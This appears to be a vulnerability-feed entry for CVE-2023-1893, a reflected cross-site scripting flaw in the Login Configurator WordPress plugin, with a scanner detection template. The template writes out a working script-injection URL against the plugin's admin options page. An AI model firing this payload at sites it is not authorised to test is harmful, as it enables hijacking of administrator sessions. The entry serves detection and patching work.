CVE-2023-1893: Login Configurator <=2.1 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Login Configurator | POC: 已公开

漏洞描述

Login Configurator WordPress plugin <= 2.1 contains a reflected cross-site scripting caused by improper escaping of URL parameter before outputting it to the page, letting attackers execute scripts in the context of site administrators, exploit requires victim to visit a malicious URL.

PoC代码[已公开]

id: CVE-2023-1893

info:
  name: Login Configurator <=2.1 - Cross-Site Scripting
  author: 0xr2r
  severity: medium
  description: |
    Login Configurator WordPress plugin <= 2.1 contains a reflected cross-site scripting caused by improper escaping of URL parameter before outputting it to the page, letting attackers execute scripts in the context of site administrators, exploit requires victim to visit a malicious URL.
  impact: |
    Attackers can execute arbitrary scripts in the context of site administrators, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://wpscan.com/vulnerability/dbe6cf09-971f-42e9-b744-9339454168c7
    - http://packetstormsecurity.com/files/173723/WordPress-Login-Configurator-2.1-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1893
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-1893
    cwe-id: CWE-79
    epss-score: 0.01364
    epss-percentile: 0.79516
    cpe: cpe:2.3:a:login_configurator_project:login_configurator:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: login_configurator_project
    product: login_configurator
  tags: cve,cve2023,wp,wp-plugin,wordpress,xss,login_configurator

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: word
        part: body
        words:
          - "login-configurator"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/options-general.php?page=login-configurator-options&tab=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E#top"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "<script>alert(document.domain)</script>", "login-configurator")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100def5dcff80b37b004c6980080b1751da3b4b687be5bd358b57c37edbd0d408f602202ed4f8f42c7ddfe30dfb42d0d0255a27478de47b697a2e5d14e079bbf4fb9bd1:922c64590222798bb761d5b6d8e72950